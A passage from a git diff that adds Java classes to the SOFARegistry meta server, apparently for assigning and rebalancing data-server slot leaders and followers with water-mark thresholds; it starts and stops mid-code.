Jan 14, 2021 + */ +@Component +public class ScheduledSlotArranger extends AbstractLifecycleObservable + implements DataManagerObserver, Suspendable { + + private final DefaultDataServerManager dataServerManager; + + private final SlotManager slotManager; + + private final SlotTableMonitor slotTableMonitor; + + private final MetaLeaderService metaLeaderService; + + private final Arranger arranger = new Arranger(); + + private final Lock lock = new ReentrantLock(); + + @Autowired + public ScheduledSlotArranger( + DefaultDataServerManager dataServerManager, + SlotManager slotManager, + SlotTableMonitor slotTableMonitor, + MetaLeaderService metaLeaderService) { + this.dataServerManager = dataServerManager; + this.slotManager = slotManager; + this.slotTableMonitor = slotTableMonitor; + this.metaLeaderService = metaLeaderService; + } + + @PostConstruct + public void postConstruct() throws Exception { + LifecycleHelper.initializeIfPossible(this); + LifecycleHelper.startIfPossible(this); + } + + @PreDestroy + public void preDestroy() throws Exception { + LifecycleHelper.stopIfPossible(this); + LifecycleHelper.disposeIfPossible(this); + } + + @Override + protected void doInitialize() throws InitializeException { + super.doInitialize(); + dataServerManager.addObserver(this); + Thread executor = ConcurrentUtils.createDaemonThread(getClass().getSimpleName(), arranger); + executor.start(); + } + + @Override + protected void doDispose() throws DisposeException { + arranger.close(); + dataServerManager.removeObserver(this); + super.doDispose(); + } + + @Override + public void update(Observable source, Object message) { + logger.warn("[update] receive from [{}], message: {}", source, message); + if (message instanceof NodeRemoved) { + arranger.wakeup(); + } + if (message instanceof NodeAdded) { + arranger.wakeup(); + } + } + + public boolean tryLock() { + return lock.tryLock(); + } + + public void unlock() { + lock.unlock(); + } + + private SlotTableBuilder createSlotTableBuilder( + SlotTable slotTable, List currentDataNodeIps, int slotNum, int replicas) { + NodeComparator comparator = new NodeComparator(slotTable.getDataServers(), currentDataNodeIps); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(slotTable, slotNum, replicas); + slotTableBuilder.init(currentDataNodeIps); + + comparator.getRemoved().forEach(slotTableBuilder::removeDataServerSlots); + return slotTableBuilder; + } + + protected boolean assignSlots( + SlotTableBuilder slotTableBuilder, Collection currentDataServers) { + SlotTable slotTable = createSlotAssigner(slotTableBuilder, currentDataServers).assign(); + return refreshSlotTable(slotTable); + } + + protected SlotAssigner createSlotAssigner( + SlotTableBuilder slotTableBuilder, Collection currentDataServers) { + return new DefaultSlotAssigner(slotTableBuilder, currentDataServers); + } + + protected boolean balanceSlots( + SlotTableBuilder slotTableBuilder, Collection currentDataServers) { + SlotTable slotTable = createSlotBalancer(slotTableBuilder, currentDataServers).balance(); + return refreshSlotTable(slotTable); + } + + private boolean refreshSlotTable(SlotTable slotTable) { + if (slotTable == null) { + logger.info("[refreshSlotTable] slot-table not change"); + return false; + } + if (!SlotTableUtils.isValidSlotTable(slotTable)) { + throw new SofaRegistrySlotTableException( + "slot table is not valid: \n" + JsonUtils.writeValueAsString(slotTable)); + } + if (slotTable.getEpoch() > slotManager.getSlotTable().getEpoch()) { + slotManager.refresh(slotTable); + return true; + } else { + logger.warn( + "[refreshSlotTable] slot-table epoch not change: {}", + JsonUtils.writeValueAsString(slotTable)); + return false; + } + } + + protected SlotBalancer createSlotBalancer( + SlotTableBuilder slotTableBuilder, Collection currentDataServers) { + return new DefaultSlotBalancer(slotTableBuilder, currentDataServers); + } + + @Override + public void suspend() { + arranger.suspend(); + } + + @Override + public void resume() { + arranger.resume(); + } + + @Override + public boolean isSuspended() { + return arranger.isSuspended(); + } + + private final class Arranger extends WakeUpLoopRunnable { + + private final int waitingMillis = + Integer.getInteger("registry.slot.arrange.interval.millis", 1000); + + @Override + public int getWaitingMillis() { + return waitingMillis; + } + + @Override + public void runUnthrowable() { + try { + arrangeSync(); + } catch (Throwable e) { + logger.error("failed to arrange", e); + } + } + } + + private boolean tryArrangeSlots(List dataNodes) { + if (!tryLock()) { + logger.warn("[tryArrangeSlots] tryLock failed"); + return false; + } + boolean modified = false; + try { + List currentDataNodeIps = NodeUtils.transferNodeToIpList(dataNodes); + logger.info( + "[tryArrangeSlots][begin]arrange slot with DataNode, size={}, {}", + currentDataNodeIps.size(), + currentDataNodeIps); + final SlotTable curSlotTable = slotManager.getSlotTable(); + SlotTableBuilder tableBuilder = + createSlotTableBuilder( + curSlotTable, + currentDataNodeIps, + slotManager.getSlotNums(), + slotManager.getSlotReplicaNums()); + + if (tableBuilder.hasNoAssignedSlots()) { + logger.info("[re-assign][begin] assign slots to data-server"); + modified = assignSlots(tableBuilder, currentDataNodeIps); + logger.info("[re-assign][end] modified={}", modified); + } else if (slotTableMonitor.isStableTableStable()) { + logger.info("[balance][begin] balance slots to data-server"); + modified = balanceSlots(tableBuilder, currentDataNodeIps); + logger.info("[balance][end] modified={}", modified); + } else { + logger.info("[tryArrangeSlots][end] no arrangement"); + } + } finally { + unlock(); + } + return modified; + } + + @VisibleForTesting + public boolean arrangeSync() { + if (metaLeaderService.amIStableAsLeader()) { + + // the start arrange with the dataNodes snapshot + final List dataNodes = + dataServerManager.getDataServerMetaInfo().getClusterMembers(); + if (dataNodes.isEmpty()) { + logger.warn("[Arranger] empty data server list"); + return false; + } else { + Metrics.SlotArrange.begin(); + try { + return tryArrangeSlots(dataNodes); + } finally { + Metrics.SlotArrange.end(); + } + } + } else { + logger.info( + "[arrangeSync] not stable leader for arrange, leader: [{}], is-leader: [{}], isWarmup [{}]", + metaLeaderService.getLeader(), + metaLeaderService.amILeader(), + metaLeaderService.isWarmuped()); + return false; + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/assigner/DefaultSlotAssigner.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/assigner/DefaultSlotAssigner.java new file mode 100644 index 000000000..1fdaf2915 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/assigner/DefaultSlotAssigner.java @@ -0,0 +1,220 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.assigner; + +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.monitor.Metrics; +import com.alipay.sofa.registry.server.meta.slot.SlotAssigner; +import com.alipay.sofa.registry.server.meta.slot.balance.BalancePolicy; +import com.alipay.sofa.registry.server.meta.slot.balance.NaiveBalancePolicy; +import com.alipay.sofa.registry.server.meta.slot.util.MigrateSlotGroup; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotBuilder; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotTableBuilder; +import com.alipay.sofa.registry.server.meta.slot.util.comparator.Comparators; +import com.alipay.sofa.registry.server.meta.slot.util.comparator.SortType; +import com.alipay.sofa.registry.server.meta.slot.util.selector.Selectors; +import com.alipay.sofa.registry.util.MathUtils; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.Collection; +import java.util.Collections; +import java.util.List; +import java.util.Set; + +/** + * @author chen.zhu + *

Jan 15, 2021 + */ +public class DefaultSlotAssigner implements SlotAssigner { + + private static final Logger logger = LoggerFactory.getLogger(DefaultSlotAssigner.class); + + private final Set currentDataServers; + + protected final SlotTableBuilder slotTableBuilder; + private final MigrateSlotGroup migrateSlotGroup; + + public DefaultSlotAssigner( + SlotTableBuilder slotTableBuilder, Collection currentDataServers) { + this.slotTableBuilder = slotTableBuilder; + this.currentDataServers = Collections.unmodifiableSet(Sets.newTreeSet(currentDataServers)); + this.migrateSlotGroup = slotTableBuilder.getNoAssignedSlots(); + } + + @Override + public SlotTable assign() { + if (migrateSlotGroup.isEmpty() || currentDataServers.isEmpty()) { + throw new SofaRegistryRuntimeException( + "no pending slot or available dataServers for reassignment"); + } + // TODO get the high water mark of leader + BalancePolicy balancePolicy = new NaiveBalancePolicy(); + final int ceilAvg = + MathUtils.divideCeil(slotTableBuilder.getSlotNums(), currentDataServers.size()); + final int high = balancePolicy.getHighWaterMarkSlotLeaderNums(ceilAvg); + logger.info( + "[assign][assignLeaderSlots] begin, dataServers={}, avg={}, high={}, migrate={}", + currentDataServers.size(), + ceilAvg, + high, + migrateSlotGroup); + if (tryAssignLeaderSlots(high)) { + logger.info("[assign][after assignLeaderSlots] end -- leader changed"); + slotTableBuilder.incrEpoch(); + } else { + logger.info("[assign][after assignLeaderSlots] end -- no changes"); + } + + logger.info("[assign][assignLeaderSlots] begin"); + if (assignFollowerSlots()) { + logger.info("[assign][after assignLeaderSlots] end -- follower changed"); + slotTableBuilder.incrEpoch(); + } else { + logger.info("[assign][assignLeaderSlots] end -- no changes"); + } + return slotTableBuilder.build(); + } + + private boolean tryAssignLeaderSlots(int highWatermark) { + /** + * our strategy(assign leader) is to swap follower to leader when follower is enabled if no + * followers, we select a new data-server to assign, that's simple and low prioritized so, + * leaders are resolved in an order that who has least followers first (as we wish to satisfy + * these nodes first) leaders with no follower is lowest priority, as whatever we did, it will + * pick up a candidate that is not its follower + */ + List leaders = + migrateSlotGroup.getLeadersByScore(new FewerFollowerFirstStrategy(slotTableBuilder)); + if (leaders.isEmpty()) { + logger.info("[assignLeaderSlots] no slot leader needs assign, quit"); + return false; + } + for (int slotId : leaders) { + List currentDataNodes = Lists.newArrayList(currentDataServers); + String nextLeader = + Selectors.slotLeaderSelector(highWatermark, slotTableBuilder, slotId) + .select(currentDataNodes); + boolean nextLeaderWasFollower = isNextLeaderFollowerOfSlot(slotId, nextLeader); + logger.info( + "[assignLeaderSlots]assign slot[{}] leader as [{}], upgrade={}, dataServers={}", + slotId, + nextLeader, + nextLeaderWasFollower, + currentDataServers.size()); + slotTableBuilder.replaceLeader(slotId, nextLeader); + Metrics.SlotAssign.onSlotLeaderAssign(nextLeader, slotId); + if (nextLeaderWasFollower) { + migrateSlotGroup.addFollower(slotId); + } + } + return true; + } + + private boolean isNextLeaderFollowerOfSlot(int slotId, String nextLeader) { + return slotTableBuilder.getOrCreate(slotId).containsFollower(nextLeader); + } + + private boolean assignFollowerSlots() { + List followerToAssigns = + migrateSlotGroup.getFollowersByScore(new FollowerEmergentScoreJury()); + if (followerToAssigns.isEmpty()) { + logger.info("[assignFollowerSlots] no follower slots need to assign, quit"); + return false; + } + int assignCount = 0; + for (MigrateSlotGroup.FollowerToAssign followerToAssign : followerToAssigns) { + final int slotId = followerToAssign.getSlotId(); + for (int i = 0; i < followerToAssign.getAssigneeNums(); i++) { + List candidates = Lists.newArrayList(currentDataServers); + candidates.sort(Comparators.leastFollowersFirst(slotTableBuilder)); + boolean assigned = false; + for (String candidate : candidates) { + DataNodeSlot dataNodeSlot = slotTableBuilder.getDataNodeSlot(candidate); + if (dataNodeSlot.containsFollower(slotId) || dataNodeSlot.containsLeader(slotId)) { + continue; + } + slotTableBuilder.addFollower(slotId, candidate); + Metrics.SlotAssign.onSlotFollowerAssign(candidate, slotId); + assigned = true; + assignCount++; + logger.info( + "[assignFollowerSlots]assign slot[{}] add follower as [{}], dataServers={}", + slotId, + candidate, + currentDataServers.size()); + break; + } + if (!assigned) { + logger.warn( + "[assignFollowerSlots]assign slot[{}] no dataServer to assign, dataServers={}", + slotId, + currentDataServers.size()); + } + } + } + return assignCount != 0; + } + + /** ================================== Getters ====================================== * */ + public Set getCurrentDataServers() { + return currentDataServers; + } + + public SlotTableBuilder getSlotTableBuilder() { + return slotTableBuilder; + } + + public MigrateSlotGroup getMigrateSlotGroup() { + return migrateSlotGroup; + } + + /** ================================== Classes ====================================== * */ + static class FewerFollowerFirstStrategy implements ScoreStrategy { + + final SlotTableBuilder slotTableBuilder; + + FewerFollowerFirstStrategy(SlotTableBuilder slotTableBuilder) { + this.slotTableBuilder = slotTableBuilder; + } + + @Override + public int score(Integer slotId) { + SlotBuilder slotBuilder = slotTableBuilder.getOrCreate(slotId); + int followerNums = slotBuilder.getFollowers().size(); + // if no followers, we leave it the least priority + // because our strategy(assign leader) is to swap follower to leader when follower is enabled + // if no followers, we select a new data-server to assign, that's simple and low prioritized + if (followerNums == 0) { + return Integer.MAX_VALUE; + } + return SortType.ASC.getScore(slotBuilder.getFollowers().size()); + } + } + + public static class FollowerEmergentScoreJury + implements ScoreStrategy { + + @Override + public int score(MigrateSlotGroup.FollowerToAssign followerToAssign) { + return SortType.DES.getScore(followerToAssign.getAssigneeNums()); + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/assigner/ScoreStrategy.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/assigner/ScoreStrategy.java new file mode 100644 index 000000000..f117ab92d --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/assigner/ScoreStrategy.java @@ -0,0 +1,26 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.assigner; + +/** + * @author chen.zhu + *

Jan 15, 2021 + */ +public interface ScoreStrategy { + + int score(T t); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/balance/BalancePolicy.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/balance/BalancePolicy.java new file mode 100644 index 000000000..c597a7699 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/balance/BalancePolicy.java @@ -0,0 +1,64 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.balance; + +/** + * @author chen.zhu + *

Jan 20, 2021 + */ +public interface BalancePolicy { + + /** + * Gets get low water mark slot leader nums. low watermark means the threshold we could endure + * with, that once the slot leader numbers on a data-server is under the low water mark, we need + * to rebalance the slot-table + * + * @param average the average + * @return the get low water mark slot leader nums + */ + int getLowWaterMarkSlotLeaderNums(int average); + + int getHighWaterMarkSlotLeaderNums(int average); + + /** + * Gets get low water mark of follower slot nums. low watermark means the threshold we could + * endure with, that once the follower slot numbers on a data-server is under the low water mark, + * we need to rebalance the slot-table + * + * @param average the average + * @return the get low water mark of slot follower nums + */ + int getLowWaterMarkSlotFollowerNums(int average); + + int getHighWaterMarkSlotFollowerNums(int average); + + /** + * Gets get max move leader slots. max move means the maximum number of slots' leader we are good + * to migrate per balance time + * + * @return the get max move leader slots + */ + int getMaxMoveLeaderSlots(); + + /** + * Gets get max move follower slots. max move means the maximum number of slots' followers we are + * good to migrate per balance time + * + * @return the get max move follower slots + */ + int getMaxMoveFollowerSlots(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/balance/DefaultSlotBalancer.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/balance/DefaultSlotBalancer.java new file mode 100644 index 000000000..a624128db --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/balance/DefaultSlotBalancer.java @@ -0,0 +1,655 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.balance; + +import static com.alipay.sofa.registry.server.meta.slot.balance.LeaderOnlyBalancer.TRIGGER_THESHOLD; + +import com.alipay.sofa.registry.common.model.Triple; +import com.alipay.sofa.registry.common.model.Tuple; +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.monitor.Metrics; +import com.alipay.sofa.registry.server.meta.slot.SlotBalancer; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotTableBuilder; +import com.alipay.sofa.registry.server.meta.slot.util.comparator.Comparators; +import com.alipay.sofa.registry.util.MathUtils; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import com.google.common.collect.Sets; +import java.util.*; +import org.apache.commons.lang.StringUtils; + +/** + * @author chen.zhu + *

Jan 15, 2021 + */ +public class DefaultSlotBalancer implements SlotBalancer { + + private static final Logger LOGGER = LoggerFactory.getLogger(DefaultSlotBalancer.class); + + private final Set currentDataServers; + + protected final SlotTableBuilder slotTableBuilder; + private final BalancePolicy balancePolicy = new NaiveBalancePolicy(); + private final int slotNum; + private final int slotReplicas; + + public DefaultSlotBalancer( + SlotTableBuilder slotTableBuilder, Collection currentDataServers) { + this.currentDataServers = Collections.unmodifiableSet(Sets.newTreeSet(currentDataServers)); + this.slotTableBuilder = slotTableBuilder; + this.slotNum = slotTableBuilder.getSlotNums(); + this.slotReplicas = slotTableBuilder.getSlotReplicas(); + } + + @Override + public SlotTable balance() { + if (currentDataServers.isEmpty()) { + LOGGER.error("[no available data-servers] quit"); + throw new SofaRegistryRuntimeException( + "no available data-servers for slot-table reassignment"); + } + if (slotReplicas < TRIGGER_THESHOLD) { + LOGGER.warn( + "[balance] slot replica[{}] means no followers, balance leader only", + slotTableBuilder.getSlotReplicas()); + return new LeaderOnlyBalancer(slotTableBuilder, currentDataServers).balance(); + } + if (balanceLeaderSlots()) { + LOGGER.info("[balanceLeaderSlots] end"); + slotTableBuilder.incrEpoch(); + return slotTableBuilder.build(); + } + if (balanceHighFollowerSlots()) { + LOGGER.info("[balanceHighFollowerSlots] end"); + slotTableBuilder.incrEpoch(); + return slotTableBuilder.build(); + } + if (balanceLowFollowerSlots()) { + LOGGER.info("[balanceLowFollowerSlots] end"); + slotTableBuilder.incrEpoch(); + return slotTableBuilder.build(); + } + // check the low watermark leader, the follower has balanced + // just upgrade the followers in low data server + if (balanceLowLeaders()) { + LOGGER.info("[balanceLowLeaders] end"); + slotTableBuilder.incrEpoch(); + return slotTableBuilder.build(); + } + LOGGER.info("[balance] do nothing"); + return null; + } + + private boolean balanceLeaderSlots() { + // ceil avg, find the high water mark + final int leaderCeilAvg = MathUtils.divideCeil(slotNum, currentDataServers.size()); + if (upgradeHighLeaders(leaderCeilAvg)) { + return true; + } + if (migrateHighLeaders(leaderCeilAvg)) { + return true; + } + return false; + } + + private boolean upgradeHighLeaders(int ceilAvg) { + // smoothly, find the dataNode which owners the target slot's follower + // and upgrade the follower to leader + final int maxMove = balancePolicy.getMaxMoveLeaderSlots(); + final int threshold = balancePolicy.getHighWaterMarkSlotLeaderNums(ceilAvg); + int balanced = 0; + Set notSatisfies = Sets.newHashSet(); + + while (balanced < maxMove) { + // 1. find the dataNode which has leaders more than high water mark + // and sorted by leaders.num desc + final List highDataServers = findDataServersLeaderHighWaterMark(threshold); + if (highDataServers.isEmpty()) { + break; + } + // could not found any follower to upgrade + if (notSatisfies.containsAll(highDataServers)) { + LOGGER.info( + "[upgradeHighLeaders] could not found followers to upgrade for {}", highDataServers); + break; + } + // 2. find the dataNode which could own a new leader + // exclude the high + final Set excludes = Sets.newHashSet(highDataServers); + // exclude the dataNode which could not add any leader + excludes.addAll(findDataServersLeaderHighWaterMark(threshold - 1)); + for (String highDataServer : highDataServers) { + if (notSatisfies.contains(highDataServer)) { + continue; + } + Tuple selected = selectFollower4LeaderUpgradeOut(highDataServer, excludes); + if (selected == null) { + notSatisfies.add(highDataServer); + continue; + } + final int slotId = selected.o2; + final String newLeaderDataServer = selected.o1; + slotTableBuilder.replaceLeader(slotId, newLeaderDataServer); + LOGGER.info( + "[upgradeHighLeaders] slotId={} leader balance from {} to {}", + slotId, + highDataServer, + newLeaderDataServer); + Metrics.SlotBalance.onLeaderUpgrade(highDataServer, newLeaderDataServer, slotId); + balanced++; + break; + } + } + return balanced != 0; + } + + private boolean migrateHighLeaders(int ceilAvg) { + // could not found the follower to upgrade, migrate follower first + final int maxMove = balancePolicy.getMaxMoveFollowerSlots(); + final int threshold = balancePolicy.getHighWaterMarkSlotLeaderNums(ceilAvg); + + // 1. find the dataNode which has leaders more than high water mark + // and sorted by leaders.num desc + final List highDataServers = findDataServersLeaderHighWaterMark(threshold); + if (highDataServers.isEmpty()) { + return false; + } + // 2. find the dataNode which could own a new leader + // exclude the high + final Set excludes = Sets.newHashSet(highDataServers); + // exclude the dataNode which could not add any leader + excludes.addAll(findDataServersLeaderHighWaterMark(threshold - 1)); + int balanced = 0; + final Set newFollowerDataServers = Sets.newHashSet(); + // only balance highDataServer once at one round, avoid the follower moves multi times + for (String highDataServer : highDataServers) { + Triple selected = + selectFollower4LeaderMigrate(highDataServer, excludes, newFollowerDataServers); + if (selected == null) { + LOGGER.warn( + "[migrateHighLeaders] could not find dataServer to migrate follower for {}", + highDataServer); + continue; + } + final String oldFollower = selected.getFirst(); + final int slotId = selected.getMiddle(); + final String newFollower = selected.getLast(); + slotTableBuilder.removeFollower(slotId, oldFollower); + slotTableBuilder.addFollower(slotId, newFollower); + newFollowerDataServers.add(newFollower); + LOGGER.info( + "[migrateHighLeaders] slotId={}, follower balance from {} to {}", + slotId, + oldFollower, + newFollower); + Metrics.SlotBalance.onLeaderMigrate(oldFollower, newFollower, slotId); + + balanced++; + if (balanced >= maxMove) { + break; + } + } + return balanced != 0; + } + + private boolean balanceLowLeaders() { + final int leaderFloorAvg = Math.floorDiv(slotNum, currentDataServers.size()); + final int maxMove = balancePolicy.getMaxMoveLeaderSlots(); + final int threshold = balancePolicy.getLowWaterMarkSlotLeaderNums(leaderFloorAvg); + int balanced = 0; + Set notSatisfies = Sets.newHashSet(); + + while (balanced < maxMove) { + // 1. find the dataNode which has leaders less than low water mark + // and sorted by leaders.num asc + final List lowDataServers = findDataServersLeaderLowWaterMark(threshold); + if (lowDataServers.isEmpty()) { + break; + } + // could not found any follower to upgrade + if (notSatisfies.containsAll(lowDataServers)) { + LOGGER.info( + "[upgradeLowLeaders] could not found followers to upgrade for {}", lowDataServers); + break; + } + // 2. find the dataNode which could not remove a leader exclude the low + final Set excludes = Sets.newHashSet(lowDataServers); + // exclude the dataNode which could not remove any leader + excludes.addAll(findDataServersLeaderLowWaterMark(threshold + 1)); + for (String lowDataServer : lowDataServers) { + if (notSatisfies.contains(lowDataServer)) { + continue; + } + Tuple selected = selectFollower4LeaderUpgradeIn(lowDataServer, excludes); + if (selected == null) { + notSatisfies.add(lowDataServer); + continue; + } + final int slotId = selected.o2; + final String oldLeaderDataServer = selected.o1; + final String replaceLeader = slotTableBuilder.replaceLeader(slotId, lowDataServer); + if (!StringUtils.equals(oldLeaderDataServer, replaceLeader)) { + LOGGER.error( + "[upgradeLowLeaders] conflict leader, slotId={} leader balance from {}/{} to {}", + slotId, + oldLeaderDataServer, + replaceLeader, + lowDataServer); + throw new SofaRegistryRuntimeException( + String.format( + "upgradeLowLeaders, conflict leader=%d of %s and %s", + slotId, oldLeaderDataServer, replaceLeader)); + } + Metrics.SlotBalance.onLowLeaderReplace(oldLeaderDataServer, replaceLeader, slotId); + LOGGER.info( + "[upgradeLowLeaders] slotId={} leader balance from {} to {}", + slotId, + oldLeaderDataServer, + lowDataServer); + balanced++; + break; + } + } + return balanced != 0; + } + + private Triple selectFollower4LeaderMigrate( + String leaderDataServer, Set excludes, Set newFollowerDataServers) { + final DataNodeSlot dataNodeSlot = slotTableBuilder.getDataNodeSlot(leaderDataServer); + Set leaderSlots = dataNodeSlot.getLeaders(); + Map> dataServersWithFollowers = Maps.newHashMap(); + for (int slot : leaderSlots) { + List followerDataServers = slotTableBuilder.getDataServersOwnsFollower(slot); + for (String followerDataServer : followerDataServers) { + if (newFollowerDataServers.contains(followerDataServer)) { + // the followerDataServer contains move in follower, could not be move out candidates + continue; + } + List followerSlots = + dataServersWithFollowers.computeIfAbsent(followerDataServer, k -> Lists.newArrayList()); + followerSlots.add(slot); + } + } + LOGGER.info( + "[selectFollower4LeaderMigrate] {} owns leader slots={}, slotIds={}, migrate candidates {}, newFollowers={}", + leaderDataServer, + leaderSlots.size(), + leaderSlots, + dataServersWithFollowers, + newFollowerDataServers); + // sort the dataServer by follower.num desc + List migrateDataServers = Lists.newArrayList(dataServersWithFollowers.keySet()); + migrateDataServers.sort(Comparators.mostFollowersFirst(slotTableBuilder)); + for (String migrateDataServer : migrateDataServers) { + final List selectedFollowers = dataServersWithFollowers.get(migrateDataServer); + for (Integer selectedFollower : selectedFollowers) { + // chose the dataServer which own least leaders + List candidates = + getCandidateDataServers( + excludes, Comparators.leastLeadersFirst(slotTableBuilder), currentDataServers); + for (String candidate : candidates) { + if (candidate.equals(migrateDataServer)) { + // the same, skip + continue; + } + DataNodeSlot candidateDataNodeSlot = slotTableBuilder.getDataNodeSlot(candidate); + if (candidateDataNodeSlot.containsFollower(selectedFollower)) { + LOGGER.error( + "[selectFollower4LeaderMigrate] slotId={}, follower conflict with migrate from {} to {}", + selectedFollower, + migrateDataServer, + candidateDataNodeSlot); + continue; + } + return Triple.from(migrateDataServer, selectedFollower, candidate); + } + } + } + return null; + } + + private Tuple selectFollower4LeaderUpgradeOut( + String leaderDataServer, Set excludes) { + final DataNodeSlot dataNodeSlot = slotTableBuilder.getDataNodeSlot(leaderDataServer); + Set leaderSlots = dataNodeSlot.getLeaders(); + Map> dataServers2Followers = Maps.newHashMap(); + for (int slot : leaderSlots) { + List followerDataServers = slotTableBuilder.getDataServersOwnsFollower(slot); + followerDataServers = getCandidateDataServers(excludes, null, followerDataServers); + for (String followerDataServer : followerDataServers) { + List followerSlots = + dataServers2Followers.computeIfAbsent(followerDataServer, k -> Lists.newArrayList()); + followerSlots.add(slot); + } + } + if (dataServers2Followers.isEmpty()) { + LOGGER.info( + "[LeaderUpgradeOut] {} owns leader slots={}, no dataServers could be upgrade, slotId={}", + leaderDataServer, + leaderSlots.size(), + leaderSlots); + return null; + } else { + LOGGER.info( + "[LeaderUpgradeOut] {} owns leader slots={}, slotIds={}, upgrade candidates {}", + leaderDataServer, + leaderSlots.size(), + leaderSlots, + dataServers2Followers); + } + // sort the dataServer by leaders.num asc + List dataServers = Lists.newArrayList(dataServers2Followers.keySet()); + dataServers.sort(Comparators.leastLeadersFirst(slotTableBuilder)); + final String selectedDataServer = dataServers.get(0); + List followers = dataServers2Followers.get(selectedDataServer); + return Tuple.of(selectedDataServer, followers.get(0)); + } + + private Tuple selectFollower4LeaderUpgradeIn( + String followerDataServer, Set excludes) { + final DataNodeSlot dataNodeSlot = slotTableBuilder.getDataNodeSlot(followerDataServer); + Set followerSlots = dataNodeSlot.getFollowers(); + LOGGER.info( + "[LeaderUpgradeIn] {} find follower to upgrade, {}/{}", + followerDataServer, + followerSlots.size(), + followerSlots); + Map> dataServers2Leaders = Maps.newHashMap(); + for (int slot : followerSlots) { + final String leaderDataServer = slotTableBuilder.getDataServersOwnsLeader(slot); + if (StringUtils.isBlank(leaderDataServer)) { + // no leader, should not happen + LOGGER.error("[LeaderUpgradeIn] no leader for slotId={} in {}", slot, followerDataServer); + continue; + } + if (excludes.contains(leaderDataServer)) { + final DataNodeSlot leaderDataNodeSlot = slotTableBuilder.getDataNodeSlot(leaderDataServer); + LOGGER.info( + "[LeaderUpgradeIn] {} not owns enough leader to downgrade slotId={} for {}, leaderSize={}", + leaderDataServer, + slot, + followerDataServer, + leaderDataNodeSlot.getLeaders().size()); + continue; + } + + List leaders = + dataServers2Leaders.computeIfAbsent(leaderDataServer, k -> Lists.newArrayList()); + leaders.add(slot); + } + if (dataServers2Leaders.isEmpty()) { + LOGGER.info( + "[LeaderUpgradeIn] {} owns followerSize={}, no dataServers could be downgrade, slotId={}", + followerDataServer, + followerSlots.size(), + followerSlots); + return null; + } else { + LOGGER.info( + "[LeaderUpgradeIn] {} owns followerSize={}, slotIds={}, downgrade candidates {}", + followerDataServer, + followerSlots.size(), + followerSlots, + dataServers2Leaders); + } + // sort the dataServer by leaders.num asc + List dataServers = Lists.newArrayList(dataServers2Leaders.keySet()); + dataServers.sort(Comparators.mostLeadersFirst(slotTableBuilder)); + final String selectedDataServer = dataServers.get(0); + List leaders = 